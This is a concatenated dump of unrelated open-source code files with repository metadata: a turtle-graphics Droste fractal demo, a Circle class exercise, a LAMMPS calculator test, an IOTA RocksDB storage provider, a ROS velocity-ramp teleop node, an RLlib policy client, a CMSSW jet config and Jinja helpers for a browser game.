    `size` is the side length of the underlying square."""
# Move to the right corner before drawing:
turtle.penup()
turtle.forward(math.sqrt(size ** 2 / 2))
turtle.right(135)
turtle.pendown()
    # extraData['colors'] supplies the palette; pick a color by iteration:
    if extraData is not None and 'colors' in extraData:
iteration = extraData['_iteration'] - 1 # -1 because iteration starts at 1, not 0.
turtle.fillcolor(extraData['colors'][iteration % len(extraData['colors'])])
turtle.pencolor(extraData['colors'][iteration % len(extraData['colors'])])
# Draw a square:
turtle.begin_fill()
for i in range(4):
turtle.forward(size)
turtle.right(90)
turtle.end_fill()
def drosteDraw(drawFunction, size, recursiveDrawings, extraData=None):
# NOTE: The current heading of the turtle is considered to be the
# rightward or positive-x direction.
# Provide default values for extraData:
if extraData is None:
extraData = {}
if '_iteration' not in extraData:
extraData['_iteration'] = 1 # The first iteration is 1, not 0.
if '_maxIteration' not in extraData:
extraData['_maxIteration'] = MAX_ITERATION
if '_maxFunctionCalls' not in extraData:
extraData['_maxFunctionCalls'] = MAX_FUNCTION_CALLS
if '_minSize' not in extraData:
extraData['_minSize'] = MIN_SIZE
requiredNumCalls = len(recursiveDrawings) ** extraData['_iteration']
if extraData['_iteration'] > extraData['_maxIteration'] or \
requiredNumCalls > extraData['_maxFunctionCalls'] or \
size < extraData['_minSize']:
return # BASE CASE
# Remember the original starting coordinates and heading.
origX = turtle.xcor()
origY = turtle.ycor()
origHeading = turtle.heading()
turtle.pendown()
drawFunction(size, extraData)
turtle.penup()
# RECURSIVE CASE
# Do each of the recursive drawings:
for i, recursiveDrawing in enumerate(recursiveDrawings):
# Provide default values for the recursiveDrawing dictionary:
if 'x' not in recursiveDrawing:
recursiveDrawing['x'] = 0
if 'y' not in recursiveDrawing:
recursiveDrawing['y'] = 0
if 'size' not in recursiveDrawing:
recursiveDrawing['size'] = 1.0
if 'angle' not in recursiveDrawing:
recursiveDrawing['angle'] = 0
# Move the turtle into position for the next recursive drawing:
turtle.goto(origX, origY)
turtle.setheading(origHeading + recursiveDrawing['angle'])
turtle.forward(size * recursiveDrawing['x'])
turtle.left(90)
turtle.forward(size * recursiveDrawing['y'])
turtle.right(90)
# Increment the iteration count for the next level of recursion:
extraData['_iteration'] += 1
drosteDraw(drawFunction, int(size * recursiveDrawing['size']), recursiveDrawings, extraData)
# Decrement the iteration count when done with that recursion:
extraData['_iteration'] -= 1
# Display any buffered drawing commands on the screen:
if extraData['_iteration'] == 1:
turtle.update()
_DEMO_NUM = 0
def demo(x=None, y=None):
global _DEMO_NUM
turtle.reset()
turtle.tracer(20000, 0) # Increase the first argument to speed up the drawing.
turtle.hideturtle()
if _DEMO_NUM == 0:
# Recursively draw smaller squares in the center:
drosteDraw(drawSquare, 350, [{'size': 0.8}])
elif _DEMO_NUM == 1:
# Recursively draw smaller squares going off to the right:
drosteDraw(drawSquare, 350, [{'size': 0.8, 'x': 0.20}])
elif _DEMO_NUM == 2:
# Recursively draw smaller squares that go up at an angle:
drosteDraw(drawSquare, 350, [{'size': 0.8, 'y': 0.20, 'angle': 15}])
elif _DEMO_NUM == 3:
# Recursively draw smaller triangle in the center:
drosteDraw(drawTriangle, 350, [{'size': 0.8}])
elif _DEMO_NUM == 4:
# Recursively draw smaller triangle going off to the right:
drosteDraw(drawTriangle, 350, [{'size': 0.8, 'x': 0.20}])
elif _DEMO_NUM == 5:
# Recursively draw smaller triangle that go up at an angle:
drosteDraw(drawTriangle, 350, [{'size': 0.8, 'y': 0.20, 'angle': 15}])
elif _DEMO_NUM == 6:
# Recursively draw a spirograph of squares:
drosteDraw(drawSquare, 150, [{'angle': 10, 'x': 0.1}])
elif _DEMO_NUM == 7:
# Recursively draw a smaller square in each of the four corners of the parent square:
drosteDraw(drawSquare, 350, [{'size': 0.5, 'x': -0.5, 'y': 0.5},
{'size': 0.5, 'x': 0.5, 'y': 0.5},
{'size': 0.5, 'x': -0.5, 'y': -0.5},
{'size': 0.5, 'x': 0.5, 'y': -0.5}])
elif _DEMO_NUM == 8:
# Recursively draw smaller filled squares in the center, alternating red and black:
drosteDraw(drawFilledSquare, 350, [{'size': 0.8}], {'colors': ['red', 'black']})
elif _DEMO_NUM == 9:
# Recursively draw a smaller filled square in each of the four corners of the parent square with red and black:
drosteDraw(drawFilledSquare, 350, [{'size': 0.5, 'x': -0.5, 'y': 0.5},
{'size': 0.5, 'x': 0.5, 'y': 0.5},
{'size': 0.5, 'x': -0.5, 'y': -0.5},
{'size': 0.5, 'x': 0.5, 'y': -0.5}], {'colors': ['red', 'black']})
elif _DEMO_NUM == 10:
# Recursively draw a smaller filled square in each of the four corners of the parent square with white and black:
drosteDraw(drawFilledSquare, 350, [{'size': 0.5, 'x': -0.5, 'y': 0.5},
{'size': 0.5, 'x': 0.5, 'y': 0.5},
{'size': 0.5, 'x': -0.5, 'y': -0.5},
{'size': 0.5, 'x': 0.5, 'y': -0.5}], {'colors': ['white', 'black']})
elif _DEMO_NUM == 11:
# Recursively draw a smaller filled square in each of the four corners of the parent square:
drosteDraw(drawFilledDiamond, 350, [{'size': 0.5, 'x': -0.45, 'y': 0.45},
{'size': 0.5, 'x': 0.45, 'y': 0.45},
{'size': 0.5, 'x': -0.45, 'y': -0.45},
{'size': 0.5, 'x': 0.45, 'y': -0.45}], {'colors': ['green', 'yellow']})
elif _DEMO_NUM == 12:
# Draw the sierpinsky triangle:
drosteDraw(drawTriangle, 600, [{'size': 0.5, 'x': 0, 'y': math.sqrt(3) / 6, 'angle': 0},
{'size': 0.5, 'x': 0, 'y': math.sqrt(3) / 6, 'angle': 120},
{'size': 0.5, 'x': 0, 'y': math.sqrt(3) / 6, 'angle': 240}])
elif _DEMO_NUM == 13:
# Draw a recursive "glider" shape from Conway's Game of Life:
drosteDraw(drawSquare, 600, [{'size': 0.333, 'x': 0, 'y': 0.333},
{'size': 0.333, 'x': 0.333, 'y': 0},
{'size': 0.333, 'x': 0.333, 'y': -0.333},
{'size': 0.333, 'x': 0, 'y': -0.333},
{'size': 0.333, 'x': -0.333, 'y': -0.333}])
turtle.exitonclick()
_DEMO_NUM += 1
def main():
# Start the demo:
turtle.onscreenclick(demo)
demo()
turtle.mainloop()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
e0d852a289aa3a8e3aca62072d98ba4f2cf26939 | 33524b5c049f934ce27fbf046db95799ac003385 | /2018/Other/Urok_10_0_классы_объекты/teoriya_class_0.py | 68f7a2ba67558f66e7e39854b191bc7d8ef21224 | [] | no_license | mgbo/My_Exercise | 07b5f696d383b3b160262c5978ad645b46244b70 | 53fb175836717493e2c813ecb45c5d5e9d28dd23 | refs/heads/master | 2022-12-24T14:11:02.271443 | 2020-10-04T04:44:38 | 2020-10-04T04:44:38 | 291,413,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 758 | py |
from math import pi
class Circle:
def __init__(self, x=0, y=0, r=0):
self.x = x
self.y = y
self.r = r
def __str__(self):
return "({},{},{})".format(self.x,self.y,self.r)
def read(self):
self.x,self.y,self.r = map(int,input().split())
def area(self):
a = pi*self.r * self.r
return a
def perimetr(self):
return 2*pi*self.r
def zoom(self, k):
self.r *=k
    def is_crossed(self, c):  # does this circle intersect circle c?
        d2 = (self.x - c.x) ** 2 + (self.y - c.y) ** 2
        r2 = (self.r + c.r) ** 2
        return d2 <= r2
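    # Worked example: centers (0, 0) and (4, 0) with radii 3 and 1 give
    # d2 = 4**2 = 16 and r2 = (3 + 1)**2 = 16, so d2 <= r2 and the
    # circles count as touching.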
c1 = Circle()
c2 = Circle()
'''
c1.r = 3
c2.r = 5
c2.x = 1
c2.y = 1
'''
c1.read()
c2.read()
print (c1)
print (c2)
'''
ans = c1.area()
print (ans)
'''
| [
"[email protected]"
] | |
bbf5068fcd5c3270cf2448fddc69044e5fb04048 | ddac7346ca9f1c1d61dfd7b3c70dc6cd076a9b49 | /tests/test_calculators.py | ea4ae7c9ee767f607d8382ac221cc57272a8fee0 | [
"MIT"
] | permissive | gvenus/dftfit | f8cf5e9bef5a173ff0aa7202bacbfee0df61bd14 | a00354f8f0d611bf57c6925f920c749d8628cf98 | refs/heads/master | 2023-03-17T18:58:52.287217 | 2019-10-20T04:07:44 | 2019-10-20T04:07:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,979 | py | import asyncio
import shutil
import pymatgen as pmg
import numpy as np
import pytest
from dftfit.io.lammps import LammpsLocalDFTFITCalculator
from dftfit.io.lammps_cython import LammpsCythonDFTFITCalculator
from dftfit.cli.utils import load_filename
from dftfit.potential import Potential
@pytest.mark.pymatgen_lammps
@pytest.mark.lammps_cython
@pytest.mark.calculator
def test_calculator_equivalency(structure):
target_a = 4.1990858
s = structure('test_files/structure/MgO.cif')
lattice = pmg.Lattice.from_parameters(target_a, target_a, target_a, 90, 90, 90)
s.modify_lattice(lattice)
assert np.all(np.isclose(s.lattice.abc, (target_a, target_a, target_a)))
s = s * (2, 2, 2)
assert len(s) == 64
base_directory = 'test_files/dftfit_calculators/'
potential_schema = load_filename(base_directory + 'potential.yaml')
potential_schema['spec']['charge']['Mg']['initial'] = 1.4
potential_schema['spec']['charge']['O']['initial'] = -1.4
potential = Potential(potential_schema)
command = None
if shutil.which('lammps'): command = 'lammps'
elif shutil.which('lmp_serial'): command = 'lmp_serial'
calculators = [
LammpsLocalDFTFITCalculator(structures=[s], potential=potential, command=command, num_workers=1),
LammpsCythonDFTFITCalculator(structures=[s], potential=potential)
]
loop = asyncio.get_event_loop()
results = []
async def run(calc, potential):
await calc.create()
return await calc.submit(potential)
for calc in calculators:
results.append(loop.run_until_complete(run(calc, potential)))
assert len(results) == 2
assert len(results[0]) == 1
assert len(results[1]) == 1
for r1, r2 in zip(*results):
assert r1.structure == r2.structure
assert abs(r1.energy - r2.energy) < 1e-4
assert np.all(np.isclose(r1.forces, r2.forces, atol=1e-8))
assert np.all(np.isclose(r1.stress, r2.stress, atol=1e-8))
| [
"[email protected]"
] | |
bde27465e5215f809b247a635fd24f3186193786 | 0698be34413debeb570e2560072c5696433acd81 | /ForkTube/celeryconfig.py | 1a437d56f6e0390a359e88338fe971e211e45e34 | [] | no_license | Miserlou/ForkTube | 90a057c459fda4b8d92d94f89c9d86bf786549ca | 848fdf4ff81c1d70b03c30a6382c8464dd4f25fe | refs/heads/master | 2020-05-19T07:47:44.130888 | 2012-04-09T19:53:24 | 2012-04-09T19:53:24 | 2,363,212 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | BROKER_HOST = "localhost"
BROKER_PORT = 5672
BROKER_USER = "myuser"
BROKER_PASSWORD = "mypassword"
BROKER_VHOST = "myvhost"
CELERY_RESULT_BACKEND = "amqp"
CELERY_IMPORTS = ("tasks", )
| [
"[email protected]"
] | |
38bae379c04d24789026484a687ef0293b07e1f4 | d346c1e694e376c303f1b55808d90429a1ad3c3a | /medium/61.rotate_list.py | 86f5af201842b8ba886e5132edcc3439263c61a5 | [] | no_license | littleliona/leetcode | 3d06bc27c0ef59b863a2119cd5222dc94ed57b56 | 789d8d5c9cfd90b872be4a4c35a34a766d95f282 | refs/heads/master | 2021-01-19T11:52:11.938391 | 2018-02-19T03:01:47 | 2018-02-19T03:01:47 | 88,000,832 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,234 | py | # Definition for singly-linked list.
class ListNode:
    def __init__(self, x):
        self.val = x
        self.next = None
class Solution:
def rotateRight(self, head, k):
"""
:type head: ListNode
:type k: int
:rtype: ListNode
"""
        # Approach 1: collect the nodes into a list, then relink around the pivot.
current = head
storeList = []
while current != None:
storeList.append(current)
current = current.next
if len(storeList) <= 1:
return head
k = k % len(storeList)
if k == 0:
return head
res = storeList[-k]
storeList[-k - 1].next = None
storeList[-1].next = head
return res
        # Approach 2 ("mine"): in-place pointer rotation. Unreachable after
        # the return above; kept for reference.
        if not head or not head.next or k == 0:
return head
length_list = 1
current = head
while current.next:
current = current.next
length_list += 1
current.next = head
current = head
for i in range(1,length_list - (k % length_list)):
current = current.next
head = current.next
current.next = None
return head
# Quick check: rotate 1->2->3->4->5 right by 2; expect 4 5 1 2 3.
nodes = [ListNode(v) for v in [1, 2, 3, 4, 5]]
for a, b in zip(nodes, nodes[1:]):
    a.next = b
head = Solution().rotateRight(nodes[0], 2)
while head:
    print(head.val)
    head = head.next
| [
"[email protected]"
] | |
3610918d2b73d9d7fb9529196d9121b89800d8c4 | 03901933adfaa9130979b36f1e42fb67b1e9f850 | /iotapy/storage/providers/rocksdb.py | a1b6d630c97ebda8f54229ab370820ab8f9b63f1 | [
"MIT"
] | permissive | aliciawyy/iota-python | 03418a451b0153a1c55b3951d18d4cb533c7ff28 | b8d421acf94ccd9e7374f799fbe496f6d23e3cf3 | refs/heads/master | 2020-03-19T04:15:54.594313 | 2018-06-04T18:26:52 | 2018-06-04T18:26:52 | 135,811,581 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,363 | py | # -*- coding: utf-8 -*-
import struct
import iota
import rocksdb_iota
import iotapy.storage.providers.types
from rocksdb_iota.merge_operators import StringAppendOperator
from iotapy.storage import converter
KB = 1024
MB = KB * 1024
MERGED = ['tag', 'bundle', 'approvee', 'address', 'state_diff']
class RocksDBProvider:
BLOOM_FILTER_BITS_PER_KEY = 10
column_family_names = [
b'default',
b'transaction',
b'transaction-metadata',
b'milestone',
b'stateDiff',
b'address',
b'approvee',
b'bundle',
b'tag'
]
column_family_python_mapping = {
'transaction_metadata': 'transaction-metadata',
'state_diff': 'stateDiff'
}
def __init__(self, db_path, db_log_path, cache_size=4096, read_only=True):
self.db = None
self.db_path = db_path
self.db_log_path = db_log_path
self.cache_size = cache_size
self.read_only = read_only
self.available = False
def init(self):
self.init_db(self.db_path, self.db_log_path)
self.available = True
def init_db(self, db_path, db_log_path):
options = rocksdb_iota.Options(
create_if_missing=True,
db_log_dir=db_log_path,
max_log_file_size=MB,
max_manifest_file_size=MB,
max_open_files=10000,
max_background_compactions=1
)
options.allow_concurrent_memtable_write = True
# XXX: How to use this?
block_based_table_config = rocksdb_iota.BlockBasedTableFactory(
filter_policy=rocksdb_iota.BloomFilterPolicy(self.BLOOM_FILTER_BITS_PER_KEY),
block_size_deviation=10,
block_restart_interval=16,
block_cache=rocksdb_iota.LRUCache(self.cache_size * KB),
block_cache_compressed=rocksdb_iota.LRUCache(32 * KB, shard_bits=10))
options.table_factory = block_based_table_config
# XXX: How to use this?
column_family_options = rocksdb_iota.ColumnFamilyOptions(
merge_operator=StringAppendOperator(),
table_factory=block_based_table_config,
max_write_buffer_number=2,
write_buffer_size=2 * MB)
try:
self.db = rocksdb_iota.DB(
self.db_path, options, self.column_family_names,
read_only=self.read_only)
except rocksdb_iota.errors.InvalidArgument as e:
if 'Column family not found' in str(e):
# Currently, rocksdb_iota didn't support
# "create_if_column_family_missing" option, if we detect this
# is a new database, we will need to create its whole
# column family manually.
self.db = rocksdb_iota.DB(
self.db_path, options, [b'default'], read_only=self.read_only)
# Skip to create b'default'
for column_family in self.column_family_names[1:]:
self.db.create_column_family(column_family)
else:
raise e
def _convert_column_to_handler(self, column):
if not isinstance(column, str):
raise TypeError('Column type should be str')
db_column = self.column_family_python_mapping.get(column, column)
ch = self.db.column_family_handles.get(bytes(db_column, 'ascii'))
if ch is None:
raise KeyError('Invalid column family name: %s' % (column))
return ch
def _convert_key_column(self, key, column):
# Convert column to column family handler
ch = self._convert_column_to_handler(column)
# Expand iota.Tag to iota.Hash
if column == 'tag':
if not isinstance(key, iota.Tag):
raise TypeError('Tag key type should be iota.Tag')
key = iota.Hash(str(key))
# Convert key into trits-binary
if column == 'milestone':
if not isinstance(key, int):
raise TypeError('Milestone key type should be int')
key = struct.pack('>l', key)
else:
if not isinstance(key, iota.TryteString):
raise TypeError('Key type should be iota.TryteString')
if len(key) != iota.Hash.LEN:
raise ValueError('Key length must be 81 trytes')
key = converter.from_trits_to_binary(key.as_trits())
return key, ch
def _get(self, key, bytes_, column):
# Convert value (bytes_) into data object
obj = getattr(iotapy.storage.providers.types, column).get(bytes_, key)
# Handle metadata
if obj and key and column == 'transaction':
obj.set_metadata(self.get(key, 'transaction_metadata'))
return obj
def _get_key(self, bytes_, column):
return getattr(iotapy.storage.providers.types, column).get_key(bytes_)
def _save(self, value, column):
# Convert value to bytes
return getattr(iotapy.storage.providers.types, column).save(value)
def get(self, key, column):
k, ch = self._convert_key_column(key, column)
# Get binary data from database
bytes_ = self.db.get(k, ch)
return self._get(key, bytes_, column)
def next(self, key, column):
key, ch = self._convert_key_column(key, column)
it = self.db.iteritems(ch)
it.seek(key)
next(it)
# XXX: We will get segfault if this is NULL in database
key, bytes_ = it.get()
key = self._get_key(key, column)
# Convert into data object
return key, self._get(key, bytes_, column)
def first(self, column):
ch = self._convert_column_to_handler(column)
it = self.db.iteritems(ch)
it.seek_to_first()
# XXX: We will get segfault if this is NULL in database
key, bytes_ = it.get()
key = self._get_key(key, column)
# Convert into data object
return key, self._get(key, bytes_, column)
def latest(self, column):
ch = self._convert_column_to_handler(column)
it = self.db.iteritems(ch)
it.seek_to_last()
# XXX: We will get segfault if this is NULL in database
key, bytes_ = it.get()
key = self._get_key(key, column)
# Convert into data object
return key, self._get(key, bytes_, column)
def may_exist(self, key, column, fetch=False):
key, ch = self._convert_key_column(key, column)
# XXX: Not working......
return self.db.key_may_exist(key, ch)[0]
def save(self, key, value, column):
key, ch = self._convert_key_column(key, column)
value = self._save(value, column)
self.db.put(key, value, ch)
def store(self, key, value, column):
        # Store differs from save: storing a transaction also writes its
        # related data (address, tag, bundle, approvee) to other columns.
batches = getattr(iotapy.storage.providers.types, column).store(key, value)
write_batch = rocksdb_iota.WriteBatch()
for k, v, column in batches:
k, ch = self._convert_key_column(k, column)
v = self._save(v, column)
if column in MERGED:
write_batch.merge(k, v, ch)
else:
write_batch.put(k, v, ch)
self.db.write(write_batch)
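    # Minimal usage sketch (the paths and hash below are hypothetical and
    # assume an existing IRI-format RocksDB database):
    #
    #   provider = RocksDBProvider('/var/db/iri/mainnetdb', '/var/log/iri')
    #   provider.init()
    #   tx = provider.get(iota.Hash(b'9' * 81), 'transaction')
    #   key, milestone = provider.latest('milestone')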
| [
"[email protected]"
] | |
710f90e901aebc0be4d31eed525c04c01665c3e0 | 3ad6d731c994813a10801829c45f56c58ff9021d | /src/teleop_bot/src/keys_to_twist_with_ramps.py | f8bf0f492753a4cd8e20f5fa2477366b8f82f090 | [] | no_license | bladesaber/ROS_tutorial | 9b4ae5a9a1bd773ae48d836a87d08bde8a757a5d | 63486048786ebc864bc731eb1b524a72e9267738 | refs/heads/master | 2022-11-16T07:36:15.938433 | 2020-07-07T02:47:50 | 2020-07-07T02:47:50 | 277,693,692 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,584 | py | #!/usr/bin/env python
import rospy
import math
from std_msgs.msg import String
from geometry_msgs.msg import Twist
key_mapping = { 'w': [ 0, 1], 'x': [ 0, -1],
'a': [ 1, 0], 'd': [-1, 0],
's': [ 0, 0] }
g_twist_pub = None
g_target_twist = None
g_last_twist = None
g_last_twist_send_time = None  # set in main(); name matches its use in send_twist()
g_vel_scales = [0.1, 0.1] # default to very slow
g_vel_ramps = [1, 1] # units: meters per second^2
def ramped_vel(v_prev, v_target, t_prev, t_now, ramp_rate):
# compute maximum velocity step
step = ramp_rate * (t_now - t_prev).to_sec()
sign = 1.0 if (v_target > v_prev) else -1.0
error = math.fabs(v_target - v_prev)
if error < step: # we can get there within this timestep. we're done.
return v_target
else:
return v_prev + sign * step # take a step towards the target
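# Worked example (numbers are illustrative): ramping from v_prev = 0 toward a
# 1.0 m/s target with ramp_rate = 1.0 m/s^2 and a 0.05 s tick allows a step of
# 0.05 m/s, so successive calls return 0.05, 0.10, 0.15, ... until the
# remaining error drops below one step and the target is returned exactly.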
def ramped_twist(prev, target, t_prev, t_now, ramps):
tw = Twist()
tw.angular.z = ramped_vel(prev.angular.z, target.angular.z, t_prev,
t_now, ramps[0])
tw.linear.x = ramped_vel(prev.linear.x, target.linear.x, t_prev,
t_now, ramps[1])
return tw
def send_twist():
global g_last_twist_send_time, g_target_twist, g_last_twist,\
g_vel_scales, g_vel_ramps, g_twist_pub
t_now = rospy.Time.now()
g_last_twist = ramped_twist(g_last_twist, g_target_twist,
g_last_twist_send_time, t_now, g_vel_ramps)
g_last_twist_send_time = t_now
g_twist_pub.publish(g_last_twist)
def keys_cb(msg):
global g_target_twist, g_last_twist, g_vel_scales
if len(msg.data) == 0 or not key_mapping.has_key(msg.data[0]):
return # unknown key.
vels = key_mapping[msg.data[0]]
g_target_twist.angular.z = vels[0] * g_vel_scales[0]
g_target_twist.linear.x = vels[1] * g_vel_scales[1]
def fetch_param(name, default):
if rospy.has_param(name):
return rospy.get_param(name)
else:
print "parameter [%s] not defined. Defaulting to %.3f" % (name, default)
return default
if __name__ == '__main__':
rospy.init_node('keys_to_twist')
g_last_twist_send_time = rospy.Time.now()
g_twist_pub = rospy.Publisher('cmd_vel', Twist, queue_size=1)
rospy.Subscriber('keys', String, keys_cb)
g_target_twist = Twist() # initializes to zero
g_last_twist = Twist()
g_vel_scales[0] = fetch_param('~angular_scale', 0.1)
g_vel_scales[1] = fetch_param('~linear_scale', 0.1)
g_vel_ramps[0] = fetch_param('~angular_accel', 1.0)
g_vel_ramps[1] = fetch_param('~linear_accel', 1.0)
rate = rospy.Rate(20)
while not rospy.is_shutdown():
send_twist()
rate.sleep() | [
"[email protected]"
] | |
73fe66859a65e73496b91d800a11f82a54258308 | a85419f08198548eb6ba4d3df0d181769f810358 | /C_Carray/split_for_singlechannel_tests.py | 4887feeda442f244c49cc385774a1b017c5a6ddf | [] | no_license | keflavich/w51evlareductionscripts | cd0287d750d938bab96f1a7d335b3b84c27a987f | 00cb8085e8fe5c047f53852c8057a1f7457863f6 | refs/heads/master | 2021-01-17T07:26:01.574220 | 2016-07-07T09:02:26 | 2016-07-07T09:02:26 | 8,590,805 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 650 | py | # June 29, 2015
# Instead, use h2co_cvel_split in ../C_AC
# outputvis_A = 'h2co11_Cband_Aarray_nocal_20to100kms.ms'
# split(vis=outputvis_A, outputvis='h2co11_Cband_Aarray_nocal_20kms_onechan.ms',
# spw='0:0', width=1)
# split(vis=outputvis_A, outputvis='h2co11_Cband_Aarray_nocal_57kms_onechan.ms',
# spw='0:74', width=1)
# outputvis_C = 'h2co11_Cband_Carray_nocal_20to100kms.ms'
# split(vis=outputvis_C, outputvis='h2co11_Cband_Carray_nocal_20kms_onechan.ms',
# spw='0:0', width=1, datacolumn='data')
# split(vis=outputvis_C, outputvis='h2co11_Cband_Carray_nocal_57kms_onechan.ms',
# spw='0:74', width=1, datacolumn='data')
| [
"[email protected]"
] | |
2e5daa13e1b08a262d40a179079d7d11029e9af2 | 5a0d6fff86846117420a776e19ca79649d1748e1 | /rllib_exercises/serving/do_rollouts.py | d2dff98d01aa7e23c66a2e98eb958ee472389934 | [] | no_license | ray-project/tutorial | d823bafa579fca7eeb3050b0a13c01a542b6994e | 08f4f01fc3e918c997c971f7b2421551f054c851 | refs/heads/master | 2023-08-29T08:46:38.473513 | 2022-03-21T20:43:22 | 2022-03-21T20:43:22 | 89,322,668 | 838 | 247 | null | 2022-03-21T20:43:22 | 2017-04-25T05:55:26 | Jupyter Notebook | UTF-8 | Python | false | false | 1,596 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import argparse
import gym
from ray.rllib.utils.policy_client import PolicyClient
parser = argparse.ArgumentParser()
parser.add_argument(
"--no-train", action="store_true", help="Whether to disable training.")
parser.add_argument(
"--off-policy",
action="store_true",
help="Whether to take random instead of on-policy actions.")
if __name__ == "__main__":
args = parser.parse_args()
import pong_py
env = pong_py.PongJSEnv()
client = PolicyClient("http://localhost:8900")
eid = client.start_episode(training_enabled=not args.no_train)
obs = env.reset()
rewards = 0
episode = []
f = open("out.txt", "w")
while True:
if args.off_policy:
action = env.action_space.sample()
client.log_action(eid, obs, action)
else:
action = client.get_action(eid, obs)
next_obs, reward, done, info = env.step(action)
episode.append({
"obs": obs.tolist(),
"action": float(action),
"reward": reward,
})
obs = next_obs
rewards += reward
client.log_returns(eid, reward, info=info)
if done:
print("Total reward:", rewards)
f.write(json.dumps(episode))
f.write("\n")
f.flush()
rewards = 0
client.end_episode(eid, obs)
obs = env.reset()
eid = client.start_episode(training_enabled=not args.no_train)
| [
"[email protected]"
] | |
15701489ab41edd41261b2b31779b163a468529e | 44a2741832c8ca67c8e42c17a82dbe23a283428d | /cmssw/HeavyIonsAnalysis/JetAnalysis/python/jets/akVs3CaloJetSequence_pPb_mix_cff.py | 3d77c27baa5beb48450caf86750981f27c601170 | [] | no_license | yenjie/HIGenerator | 9ff00b3f98b245f375fbd1b565560fba50749344 | 28622c10395af795b2b5b1fecf42e9f6d4e26f2a | refs/heads/master | 2021-01-19T01:59:57.508354 | 2016-06-01T08:06:07 | 2016-06-01T08:06:07 | 22,097,752 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,519 | py |
import FWCore.ParameterSet.Config as cms
from PhysicsTools.PatAlgos.patHeavyIonSequences_cff import *
from HeavyIonsAnalysis.JetAnalysis.inclusiveJetAnalyzer_cff import *
akVs3Calomatch = patJetGenJetMatch.clone(
src = cms.InputTag("akVs3CaloJets"),
matched = cms.InputTag("ak3HiGenJetsCleaned")
)
akVs3Caloparton = patJetPartonMatch.clone(src = cms.InputTag("akVs3CaloJets"),
matched = cms.InputTag("hiGenParticles")
)
akVs3Calocorr = patJetCorrFactors.clone(
useNPV = False,
# primaryVertices = cms.InputTag("hiSelectedVertex"),
levels = cms.vstring('L2Relative','L3Absolute'),
src = cms.InputTag("akVs3CaloJets"),
payload = "AKVs3Calo_HI"
)
akVs3CalopatJets = patJets.clone(jetSource = cms.InputTag("akVs3CaloJets"),
jetCorrFactorsSource = cms.VInputTag(cms.InputTag("akVs3Calocorr")),
genJetMatch = cms.InputTag("akVs3Calomatch"),
genPartonMatch = cms.InputTag("akVs3Caloparton"),
jetIDMap = cms.InputTag("akVs3CaloJetID"),
addBTagInfo = False,
addTagInfos = False,
addDiscriminators = False,
addAssociatedTracks = False,
addJetCharge = False,
addJetID = False,
getJetMCFlavour = False,
addGenPartonMatch = True,
addGenJetMatch = True,
embedGenJetMatch = True,
embedGenPartonMatch = True,
embedCaloTowers = False,
embedPFCandidates = False
)
akVs3CaloJetAnalyzer = inclusiveJetAnalyzer.clone(jetTag = cms.InputTag("akVs3CalopatJets"),
genjetTag = 'ak3HiGenJetsCleaned',
rParam = 0.3,
matchJets = cms.untracked.bool(True),
matchTag = 'akPu3CalopatJets',
pfCandidateLabel = cms.untracked.InputTag('particleFlow'),
trackTag = cms.InputTag("generalTracks"),
fillGenJets = True,
isMC = True,
genParticles = cms.untracked.InputTag("hiGenParticles"),
eventInfoTag = cms.InputTag("hiSignal")
)
akVs3CaloJetSequence_mc = cms.Sequence(
akVs3Calomatch
*
akVs3Caloparton
*
akVs3Calocorr
*
akVs3CalopatJets
*
akVs3CaloJetAnalyzer
)
akVs3CaloJetSequence_data = cms.Sequence(akVs3Calocorr
*
akVs3CalopatJets
*
akVs3CaloJetAnalyzer
)
akVs3CaloJetSequence_jec = akVs3CaloJetSequence_mc
akVs3CaloJetSequence_mix = akVs3CaloJetSequence_mc
akVs3CaloJetSequence = cms.Sequence(akVs3CaloJetSequence_mix)
| [
"[email protected]"
] | |
8f8199b6e1f6dfc54c783f31a9ee7c30b7a68a8b | 86c082438a001ba48617aa756439b34423387b40 | /src/the_tale/the_tale/accounts/jinjaglobals.py | a2404ff781af031fd621d00f6e3091150a03094c | [
"BSD-3-Clause"
] | permissive | lustfullyCake/the-tale | a6c02e01ac9c72a48759716dcbff42da07a154ab | 128885ade38c392535f714e0a82fb5a96e760f6d | refs/heads/master | 2020-03-27T21:50:56.668093 | 2018-06-10T17:39:48 | 2018-06-10T17:39:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,295 | py | # coding: utf-8
from dext.common.utils import jinja2
from the_tale.accounts import logic
from the_tale.accounts import conf
@jinja2.jinjaglobal
def login_page_url(next_url='/'):
return jinja2.Markup(logic.login_page_url(next_url))
@jinja2.jinjaglobal
def login_url(next_url='/'):
return jinja2.Markup(logic.login_url(next_url))
@jinja2.jinjaglobal
def logout_url():
return jinja2.Markup(logic.logout_url())
@jinja2.jinjaglobal
def forum_complaint_theme():
return conf.accounts_settings.FORUM_COMPLAINT_THEME
@jinja2.jinjaglobal
def account_sidebar(user_account, page_account, page_caption, page_type, can_moderate=False):
from the_tale.forum.models import Thread
from the_tale.game.bills.prototypes import BillPrototype
from the_tale.linguistics.prototypes import ContributionPrototype
from the_tale.linguistics.relations import CONTRIBUTION_TYPE
from the_tale.accounts.friends.prototypes import FriendshipPrototype
from the_tale.accounts.clans.logic import ClanInfo
from the_tale.blogs.models import Post as BlogPost, POST_STATE as BLOG_POST_STATE
bills_count = BillPrototype.accepted_bills_count(page_account.id)
threads_count = Thread.objects.filter(author=page_account._model).count()
threads_with_posts = Thread.objects.filter(post__author=page_account._model).distinct().count()
templates_count = ContributionPrototype._db_filter(account_id=page_account.id,
type=CONTRIBUTION_TYPE.TEMPLATE).count()
words_count = ContributionPrototype._db_filter(account_id=page_account.id,
type=CONTRIBUTION_TYPE.WORD).count()
folclor_posts_count = BlogPost.objects.filter(author=page_account._model, state=BLOG_POST_STATE.ACCEPTED).count()
friendship = FriendshipPrototype.get_for_bidirectional(user_account, page_account)
return jinja2.Markup(jinja2.render('accounts/sidebar.html',
context={'user_account': user_account,
'page_account': page_account,
'page_caption': page_caption,
'master_clan_info': ClanInfo(page_account),
'own_clan_info': ClanInfo(user_account),
